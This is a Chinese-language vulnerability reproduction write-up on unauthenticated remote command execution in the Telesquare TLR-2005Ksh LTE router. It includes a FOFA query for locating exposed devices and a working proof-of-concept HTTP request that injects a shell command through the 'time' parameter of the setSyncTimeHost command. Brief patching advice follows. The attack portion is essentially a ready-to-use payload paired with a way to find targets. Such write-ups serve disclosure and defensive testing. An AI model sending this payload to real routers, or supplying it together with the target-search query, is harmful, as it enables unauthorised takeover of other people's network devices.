Telesquare TLR-2005Ksh 路由器 RCE漏洞复现

0x01 产品简介

 Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器。

0x02 漏洞概述

  Telesquare TLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。

0x03 复现环境

FOFA:app="TELESQUARE-TLR-2005KSH"

Telesquare TLR-2005Ksh 路由器 RCE漏洞复现_第1张图片

0x04 漏洞复现 

PoC

GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`id>1.txt` HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

Telesquare TLR-2005Ksh 路由器 RCE漏洞复现_第2张图片

PS:将命令执行结果写进txt

验证

Telesquare TLR-2005Ksh 路由器 RCE漏洞复现_第3张图片

0x05 修复建议

关闭互联网暴露面或者接口设置访问权限

升级至安全版本

你可能感兴趣的:(漏洞复现,网络,web安全,安全)